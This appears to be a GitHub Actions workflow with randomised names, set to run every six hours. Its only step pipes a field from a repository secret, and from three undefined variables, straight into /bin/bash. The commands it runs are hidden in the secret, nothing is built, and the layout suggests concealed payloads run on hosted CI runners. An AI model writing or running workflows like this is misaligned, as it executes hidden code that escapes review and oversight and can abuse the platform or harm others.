name: wuqidong4645

on:
  workflow_dispatch:
  schedule:
    - cron: '38 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wuqidong4645
        env:
          tmv43: ${{ secrets.tmv43 }}
        run: |
          echo $tmv43 | jq -r .ovdwi12914 | /bin/bash
          echo $w2353 | jq -r .esmo7 | /bin/bash
          echo $w5180 | jq -r .buooj4759 | /bin/bash
          echo $w3156 | jq -r .vlx09 | /bin/bash

